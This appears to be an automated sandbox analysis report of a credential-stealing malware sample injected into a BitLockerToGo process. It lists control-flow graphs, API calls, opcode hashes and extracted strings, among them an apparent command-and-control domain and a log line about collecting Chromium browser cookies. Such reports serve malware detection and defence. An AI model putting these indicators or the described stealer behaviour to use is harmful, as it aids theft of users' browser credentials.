                                                                                      control_flow_graph 70 2ebab80-2ebac97 call 2ebfca0 74 2ebac99 70->74 75 2ebace3-2ebad21 LoadLibraryExW call 2ee9300 70->75 77 2ebac9b-2ebacdf 74->77 81 2ebad23-2ebad30 75->81 82 2ebad35-2ebaed9 call 2eeb840 * 12 75->82 77->77 78 2ebace1 77->78 78->75 85 2ebb6d4-2ebb6e3 81->85 109 2ebaedb-2ebaee4 82->109 110 2ebaef2-2ebaf32 call 2ee42d0 109->110 111 2ebaee6-2ebaeed 109->111 117 2ebaf34-2ebaf3e 110->117 112 2ebb043-2ebb04d 111->112 112->85 118 2ebb053-2ebb258 112->118 117->117 119 2ebaf40-2ebaf58 117->119 125 2ebb25a 118->125 126 2ebb2ae-2ebb2c6 call 2ebc270 118->126 120 2ebaf5a-2ebaf60 119->120 121 2ebaf62-2ebaf65 119->121 123 2ebafc1-2ebafd2 call 2ebb6f0 120->123 124 2ebaf67-2ebaf6a 121->124 130 2ebafd7-2ebafdc 123->130 127 2ebaf6c-2ebaf6f 124->127 128 2ebaf71-2ebafbf call 2ebfb10 124->128 131 2ebb25c-2ebb2a1 125->131 141 2ebb2c8 126->141 142 2ebb2cd-2ebb387 126->142 127->123 128->123 128->124 134 2ebafde-2ebb016 130->134 135 2ebafe0-2ebb00d call 2ebc230 130->135 131->131 136 2ebb2a3-2ebb2ac 131->136 144 2ebb018-2ebb020 134->144 135->144 136->126 145 2ebb6c9-2ebb6cd 141->145 146 2ebb389 142->146 147 2ebb3cd-2ebb3e9 call 2ebc8e0 142->147 154 2ebb02b-2ebb02f 144->154 155 2ebb022-2ebb029 144->155 145->85 151 2ebb38b-2ebb3c9 146->151 157 2ebb688-2ebb6a3 call 2ee7f10 147->157 158 2ebb3ef-2ebb430 147->158 151->151 156 2ebb3cb 151->156 159 2ebb041 154->159 160 2ebb031-2ebb03c 154->160 155->154 156->147 173 2ebb6a7-2ebb6b4 157->173 174 2ebb6a5-2ebb6b6 157->174 161 2ebb48a-2ebb4b5 call 2ebc8e0 158->161 162 2ebb432 158->162 159->112 160->109 175 2ebb4bc-2ebb4f2 call 2ebc930 161->175 176 2ebb4b7 161->176 166 2ebb434-2ebb483 162->166 166->166 169 2ebb485-2ebb488 166->169 169->161 181 2ebb6bd-2ebb6c5 173->181 174->181 184 2ebb4f5-2ebb501 175->184 179 2ebb686 176->179 179->157 181->85 187 2ebb6c7 181->187 185 2ebb503-2ebb5ac 184->185 186 2ebb511-2ebb52f 184->186 196 2ebb5ae-2ebb5b8 185->196 189 2ebb56f-2ebb571 186->189 190 2ebb531-2ebb53b 186->190 187->145 193 2ebb574-2ebb597 189->193 190->189 194 2ebb53d-2ebb56d 190->194 193->184 194->193 196->196 199 2ebb5ba-2ebb5d4 196->199 200 2ebb642-2ebb65d call 2ebb6f0 199->200 201 2ebb5d6-2ebb5df 199->201 208 2ebb65f 200->208 209 2ebb661-2ebb67f call 2ebc230 200->209 203 2ebb5e1-2ebb5e7 201->203 204 2ebb5e9-2ebb5eb 203->204 205 2ebb5ed-2ebb640 call 2ebfb10 203->205 204->200 205->200 205->203 211 2ebb682-2ebb684 208->211 209->211 211->179
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID: !$#$%$'$)$+$,$-$/$1$3$5$7$9$;$=$?$C$E$callosallsaospz.shop$q$s$u$w$y${$}
                                                                                      • API String ID: 1029625771-4226161811
                                                                                      • Opcode ID: e7212606d3358eede155e74bcfd091a4a47a2c027274c128b69d970fd0628ce9
                                                                                      • Instruction ID: 99e3c4dd005c6bde6954ea9986fbffd49018a860f00e57b86e626f4a1e2d2312
                                                                                      • Opcode Fuzzy Hash: e7212606d3358eede155e74bcfd091a4a47a2c027274c128b69d970fd0628ce9
                                                                                      • Instruction Fuzzy Hash: 8E826D70508B80CED722CF38D484756BFE1AF16318F089A9DD8EA8F796D375A445CB62

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 752 2eda3f6-2eda4d5 753 2eda51f-2eda587 SysAllocString 752->753 754 2eda4d7 752->754 756 2eda591-2eda5ae 753->756 755 2eda4d9-2eda51b 754->755 755->755 757 2eda51d 755->757 757->753
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocString
                                                                                      • String ID: B$D$H$I$K$P$e$i$k$z
                                                                                      • API String ID: 2525500382-4014294549
                                                                                      • Opcode ID: 395eea914c7a45ea6ccefce512f0b7b7ec93f3a7dc3d042594d9deb7dfaa0bae
                                                                                      • Instruction ID: c93e9e93eaff25815a9a5eba95200865ac56740dfaaf960fce6df9d540ccd52c
                                                                                      • Opcode Fuzzy Hash: 395eea914c7a45ea6ccefce512f0b7b7ec93f3a7dc3d042594d9deb7dfaa0bae
                                                                                      • Instruction Fuzzy Hash: EB41B77015C7C28ED331CB288458B9BBFE16BD6318F448A6DE5E88B392C7759506CB53

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1199 2eb9980-2eb998d call 2ee9340 1202 2eb998f 1199->1202 1203 2eb9994-2eb999b call 2ee1c80 1199->1203 1204 2eb9a6b-2eb9a74 ExitProcess 1202->1204 1207 2eb999d 1203->1207 1208 2eb99a2-2eb99c4 CoInitializeEx 1203->1208 1211 2eb9a64-2eb9a69 call 2ee9c00 1207->1211 1209 2eb99cb-2eb9a29 CoInitializeSecurity 1208->1209 1210 2eb99c6 1208->1210 1217 2eb9a2b 1209->1217 1218 2eb9a2d-2eb9a34 call 2ebab80 1209->1218 1212 2eb9a62 1210->1212 1211->1204 1212->1211 1219 2eb9a5c CoUninitialize 1217->1219 1222 2eb9a38-2eb9a4e call 2eb9a80 call 2ebfcb0 1218->1222 1223 2eb9a36 1218->1223 1219->1212 1228 2eb9a53-2eb9a58 call 2ebc950 1222->1228 1224 2eb9a5a 1223->1224 1224->1219 1228->1224
                                                                                      APIs
                                                                                      Strings
                                                                                      • system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways, xrefs: 02EB9A3C
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExitProcess
                                                                                      • String ID: system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways
                                                                                      • API String ID: 621844428-780655312
                                                                                      • Opcode ID: 101abea7e0389cc5d0e1096213491d15cd3a07c1efa0b5c92e27c0aa04a18109
                                                                                      • Instruction ID: f56b4b84d681132109e744c69487b7d2aa5c68bcf02b2aad8c3165b0e37d8472
                                                                                      • Opcode Fuzzy Hash: 101abea7e0389cc5d0e1096213491d15cd3a07c1efa0b5c92e27c0aa04a18109
                                                                                      • Instruction Fuzzy Hash: 29113A7048C341CEDF42AF64C2043EF7BE4AF46358F01E919E69A86186D7798249CF93
                                                                                      APIs
                                                                                      • RtlFreeHeap.NTDLL(?,00000000), ref: 02EE7FE2
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeHeap
                                                                                      • String ID:
                                                                                      • API String ID: 3298025750-0
                                                                                      • Opcode ID: 7d1a2a79500d84bab4524fba6dab50a05b7a181d93499414b9ff31010e1d0ff9
                                                                                      • Instruction ID: 411ca45e40c02978b70a4985748d034c52a32f165f41412437e0741a5f3eb47c
                                                                                      • Opcode Fuzzy Hash: 7d1a2a79500d84bab4524fba6dab50a05b7a181d93499414b9ff31010e1d0ff9
                                                                                      • Instruction Fuzzy Hash: 90118F70A84241CFD7208F15E490B05F7B6FB89309F79C8A9C6941BB59D332A863CF80
                                                                                      APIs
                                                                                      • GetUserDefaultUILanguage.KERNELBASE ref: 02EE2DD3
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID: DefaultLanguageUser
                                                                                      • String ID:
                                                                                      • API String ID: 95929093-0
                                                                                      • Opcode ID: 19eb015ada81edec3095d9c8ade5169d727e838976df0f432897e237ef0bb852
                                                                                      • Instruction ID: fd51ee2ea612411eeffb13c88ce97fadb95ef257c5ccae872b9406b1d2a9f4da
                                                                                      • Opcode Fuzzy Hash: 19eb015ada81edec3095d9c8ade5169d727e838976df0f432897e237ef0bb852
                                                                                      • Instruction Fuzzy Hash: 45E012B95447018FC758FF7CD55055A7BE0FB48300F41482CE89AC7341D730A9548F16
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 'Ux{$(EkY$,$Z"$-124$BL@H$H09=$[XJ'$[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser$]I_`$mQS]$u1FD${)F4
                                                                                      • API String ID: 0-1645084748
                                                                                      • Opcode ID: f6db5e44b3d030e68b8eeb65848df8c9fa4ed2ccb656e55f01804f9b69de1f85
                                                                                      • Instruction ID: 05194dfcbf39eee8a1939e4755f10010cd6efacf375ab368c24d758793361306
                                                                                      • Opcode Fuzzy Hash: f6db5e44b3d030e68b8eeb65848df8c9fa4ed2ccb656e55f01804f9b69de1f85
                                                                                      • Instruction Fuzzy Hash: 44628B75680B01CFD768CF1AC590A22B7F2FF89314B5889ACD5968BB91D735F852CB40
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID: Clipboard$DataGlobalLockLongOpenWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2401467216-0
                                                                                      • Opcode ID: d380ec9faeeeedda812431b8456d2bd816cfc94b8b040062a181a9af87bd4853
                                                                                      • Instruction ID: c597d6a93eb324ef13f7eaa26f68b8a0372e35c04c5686d48e694f3a4edf4225
                                                                                      • Opcode Fuzzy Hash: d380ec9faeeeedda812431b8456d2bd816cfc94b8b040062a181a9af87bd4853
                                                                                      • Instruction Fuzzy Hash: 816179B0548B40DFD321DF39C448756BBF0AB0A314F04DA5DE89A8B791D735B859CBA2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ADXY$MQOH$SQMP$TPFR$ZTRZ$\AYL$nM
                                                                                      • API String ID: 0-3512707261
                                                                                      • Opcode ID: 1973252398b0e78a7eb1078ba18f591383cea87461deea31bc18908249ad5f5b
                                                                                      • Instruction ID: 54e86cfbe01e9fea4297355a9bb7d6fcba7e18ba58568a49de3c14fc6211b2fc
                                                                                      • Opcode Fuzzy Hash: 1973252398b0e78a7eb1078ba18f591383cea87461deea31bc18908249ad5f5b
                                                                                      • Instruction Fuzzy Hash: 2ED18CB05083808FC716CF29C4907ABFFE1AF96218F189A6DE4D99B352C7399445CB96
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Kk$[$NrJB$fc$j_]X$nn n$uHN;
                                                                                      • API String ID: 0-2328874454
                                                                                      • Opcode ID: 76c2841b8b5880d92410b60abcb3369d13172f3f4f1eaf3d32813d18c15f484e
                                                                                      • Instruction ID: 4bd6645f300287463d11f57463a4377dda1287270f0350545ccc455425314020
                                                                                      • Opcode Fuzzy Hash: 76c2841b8b5880d92410b60abcb3369d13172f3f4f1eaf3d32813d18c15f484e
                                                                                      • Instruction Fuzzy Hash: 2412C47154C3908FD725CF24C6907ABBBE2BF96308F289A5DE4D68B381D7359406CB52
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: /.)($F\F[$UUmP$^D^C
                                                                                      • API String ID: 0-1522875139
                                                                                      • Opcode ID: 25a8b894078910cef9370c0aa04e88f0101ddc63f24d047d464489ccd0618556
                                                                                      • Instruction ID: 898f73afeef23d9cd54cddad3c9f922ef0d2669bf8df12e29fcb6123952e48f5
                                                                                      • Opcode Fuzzy Hash: 25a8b894078910cef9370c0aa04e88f0101ddc63f24d047d464489ccd0618556
                                                                                      • Instruction Fuzzy Hash: 7002ABB1544B008FC728CF29D490B63B7F2AF8A308F14996DD5AA8BB91D734F856CB40
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: /.)($/.)($/.)(
                                                                                      • API String ID: 0-1945924264
                                                                                      • Opcode ID: 49b999f2b87ce15058b32fcd7ca1402a2f2b51e3de3637aa4c13c823dc0c252b
                                                                                      • Instruction ID: 75de7b0618a553dc3fdead969ee1e1c4a6ca52f6a547a0ab4374b26549f3ac37
                                                                                      • Opcode Fuzzy Hash: 49b999f2b87ce15058b32fcd7ca1402a2f2b51e3de3637aa4c13c823dc0c252b
                                                                                      • Instruction Fuzzy Hash: 4C22AE716493419FCB18CF18C490B6ABBE2FF89308F18DA6CE5968B361D731E805CB52
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: /&.7$/.)($JI
                                                                                      • API String ID: 0-2390188726
                                                                                      • Opcode ID: b21b9ff85261c5a67f071af38d867ef1ad90a57a75c97f6a69be066ae19aeeb3
                                                                                      • Instruction ID: 9f7026a46a3346fc4dbf70bf59cd9293225fd6fd1755508922bb8fd99e90285b
                                                                                      • Opcode Fuzzy Hash: b21b9ff85261c5a67f071af38d867ef1ad90a57a75c97f6a69be066ae19aeeb3
                                                                                      • Instruction Fuzzy Hash: DAC187B5988381CFD724CF14D89076BBBE2FFC6304F04996CE6998B291D375A845CB92
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @-./$q5K7
                                                                                      • API String ID: 0-1573048203
                                                                                      • Opcode ID: eeed21de94568a43906effbdf53e8aca5e670eab7935ceedbe6a466ab83fce3f
                                                                                      • Instruction ID: 7e510f223d70219bbcad134358e2bf700eaa9e345dd709c4f1fda87798a7b264
                                                                                      • Opcode Fuzzy Hash: eeed21de94568a43906effbdf53e8aca5e670eab7935ceedbe6a466ab83fce3f
                                                                                      • Instruction Fuzzy Hash: D0524775640B018FD728CF28C991B62B7F2FF8A314F54996CD9AA8BA91D734F811CB50
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: "$"
                                                                                      • API String ID: 0-3758156766
                                                                                      • Opcode ID: 53a827f5a577707896cd0954447cacffb42af77b40a9b892d2eccdbbc3246c88
                                                                                      • Instruction ID: f64dc6061950070c90e0ebb6a0f22c9c74cca4909a3a3397cd6a4f331b1c6a26
                                                                                      • Opcode Fuzzy Hash: 53a827f5a577707896cd0954447cacffb42af77b40a9b892d2eccdbbc3246c88
                                                                                      • Instruction Fuzzy Hash: ADE1C031A883818FD314CF28D45076AB7E2BFDA324F599A5DE5E5872D1C3349992CB02
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 89$i3g
                                                                                      • API String ID: 0-683074060
                                                                                      • Opcode ID: bab5a3a35564c6fd232d7e6060d56c6c06a291e5187238fad36e23e09f1b30c4
                                                                                      • Instruction ID: c1b8cb3bacd183cfe29026445d2616e1c9d0cb17e78f5ed6d345902af357b32c
                                                                                      • Opcode Fuzzy Hash: bab5a3a35564c6fd232d7e6060d56c6c06a291e5187238fad36e23e09f1b30c4
                                                                                      • Instruction Fuzzy Hash: 8D6150B05083409FD310DF19C58162BBBF5EF8A358F149A1CE4E89B3A0E378C906CB96
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: F~8;
                                                                                      • API String ID: 0-1740687480
                                                                                      • Opcode ID: ddab2099646a4f438af18789844248bc4adc82dec50485aeaeef5863f8ab887a
                                                                                      • Instruction ID: 2e6df858aa7721b88d4e72079469bf36a701245c5ec2c4b1297c086cacc29d96
                                                                                      • Opcode Fuzzy Hash: ddab2099646a4f438af18789844248bc4adc82dec50485aeaeef5863f8ab887a
                                                                                      • Instruction Fuzzy Hash: 8A72AB35A88201CFC718CF29D49066AFBF2FBC9318F5989ADD58A87751D735E891CB80
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: F~8;
                                                                                      • API String ID: 0-1740687480
                                                                                      • Opcode ID: 870992526226b9a939bbd8b1020d16679b65bccb844294115f43bc12b6761282
                                                                                      • Instruction ID: 0e2254e0d47f19c211fbd188a30c44f43352cdd562057c54bc2e83909df8eba2
                                                                                      • Opcode Fuzzy Hash: 870992526226b9a939bbd8b1020d16679b65bccb844294115f43bc12b6761282
                                                                                      • Instruction Fuzzy Hash: 4362BC34A88201CFC714CF29D49066AFBF2FB8A318F59C9ADD59A8B741D735E851CB80
                                                                                      APIs
                                                                                      • CoCreateInstance.OLE32(02EEF748,00000000,00000001,02EEF738), ref: 02ECD839
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateInstance
                                                                                      • String ID:
                                                                                      • API String ID: 542301482-0
                                                                                      • Opcode ID: e242509ccad85ffb4123d6d7b86d43f4e71594c1c47533cd8271100ff3a0235b
                                                                                      • Instruction ID: 62f7b0da552ee7c5a19b064d8e9fdc8036f8aa1a5637b81e1ae71fc7b61bb031
                                                                                      • Opcode Fuzzy Hash: e242509ccad85ffb4123d6d7b86d43f4e71594c1c47533cd8271100ff3a0235b
                                                                                      • Instruction Fuzzy Hash: C35107B5A842009BDB249FA4CC86BA373B5FF91758F24916CFA458B390F776E801C751
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: :Y>_
                                                                                      • API String ID: 0-1739490814
                                                                                      • Opcode ID: 096408c187cf6b03a7a4ff16736b4373f409204f5f9e8a025d305734b68a6627
                                                                                      • Instruction ID: b0d1875c70939ba96addd0d62e418db16c7faeb9bbccfb7fd4a0a60ec21dc510
                                                                                      • Opcode Fuzzy Hash: 096408c187cf6b03a7a4ff16736b4373f409204f5f9e8a025d305734b68a6627
                                                                                      • Instruction Fuzzy Hash: B26116B0001B019FD3248F25C6A4B22BBF1FF45318F649A8DC4AA5BB95D779F856CB84
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: /.)(
                                                                                      • API String ID: 0-2587180175
                                                                                      • Opcode ID: 4356f2a355a0ddb5d77ea1a092b26c1914c47d7e4be5f8574e7d4ae0569d810b
                                                                                      • Instruction ID: 0bd2dbccaf2195211425fe8319a4cce07689a8309061c504faa8a7799fc1d490
                                                                                      • Opcode Fuzzy Hash: 4356f2a355a0ddb5d77ea1a092b26c1914c47d7e4be5f8574e7d4ae0569d810b
                                                                                      • Instruction Fuzzy Hash: 6D1189B6A883819BD328CF04C09032BBBB2EBC6308F14981DE5C907694C730E842CF86
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7c25439432b1b14c8c339b8c95c4aad5167b548f65e3ec4e1c55e5033c6322fd
                                                                                      • Instruction ID: 6e5003b9794b2407a66b7d64c3aa592f0a7919d1b38b23bb1836fa951d30dc0a
                                                                                      • Opcode Fuzzy Hash: 7c25439432b1b14c8c339b8c95c4aad5167b548f65e3ec4e1c55e5033c6322fd
                                                                                      • Instruction Fuzzy Hash: 6752DF316483118BC726DF18D8906FBB3E6FFC4308F159A2DDA9687382D735A955CB82
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 22ff06e29bef3490ee750a5cdaf6c5fbe90b60bea94c8ca1d7f05376b01b7431
                                                                                      • Instruction ID: 32caec37b5d3f419b40ee6c001acc5d9948f161327640f2fcda27fb2c69f6e3e
                                                                                      • Opcode Fuzzy Hash: 22ff06e29bef3490ee750a5cdaf6c5fbe90b60bea94c8ca1d7f05376b01b7431
                                                                                      • Instruction Fuzzy Hash: 4C52CD34A88201CFC714CF29D4A0A66FBF2FB8A314F59C9ADD59A8B751D734E851CB80
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8e50ec53821c006bc2d218594a6a70aff45b96683fc903e098a1311951882293
                                                                                      • Instruction ID: b8a4dfcb0e398ee047cd2a7e8ced2f64112394a2c3a24b40978397b5e0f2039e
                                                                                      • Opcode Fuzzy Hash: 8e50ec53821c006bc2d218594a6a70aff45b96683fc903e098a1311951882293
                                                                                      • Instruction Fuzzy Hash: EF42CE34A88201CFC714CF29D4A0656FBF2FB8A318F59C9ADD59A8B755D335E851CB80
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9c27a585d77da08b89e5ba35a2b94eb73c99627edd4e5c49291f65613abff869
                                                                                      • Instruction ID: 102ef0b18995926f141532e4ff69a3ef8fcc2b6e29e1386819812a9daf43889f
                                                                                      • Opcode Fuzzy Hash: 9c27a585d77da08b89e5ba35a2b94eb73c99627edd4e5c49291f65613abff869
                                                                                      • Instruction Fuzzy Hash: 3D32BD70688601CFC714CF29C4A0666BBF2FF8A318F59C9ADD59A8B395D735E851CB80
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d5e018c28a066c1dd8bb2ddd8bc16fd0d8101d232570f0842bdaeffe46e0e89b
                                                                                      • Instruction ID: b450874229d52dff20d969a85f915cb5a37c8961503ae05cb77578d759e09ddb
                                                                                      • Opcode Fuzzy Hash: d5e018c28a066c1dd8bb2ddd8bc16fd0d8101d232570f0842bdaeffe46e0e89b
                                                                                      • Instruction Fuzzy Hash: 58E100B0640B408BE335CF64C590BA3BBF1BF45304F149E2DD5AA87AA5E735F8098B64
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2489717375.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_2eb0000_BitLockerToGo.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a139fd94d03d074277f70f5168bd0088a17c10045afd29af08de246661b29d7f
                                                                                      • Instruction ID: 31b7b4fe1b59b28ae6aa04fc5c1737a079303006768cb081ebbcce4aba95e460
                                                                                      • Opcode Fuzzy Hash: a139fd94d03d074277f70f5168bd0088a17c10045afd29af08de246661b29d7f
                                                                                      • Instruction Fuzzy Hash: 96D103B0640B408BE736CF35C490BA3BBF1BF45304F149A6DD5EA87AA5E735E8098B54
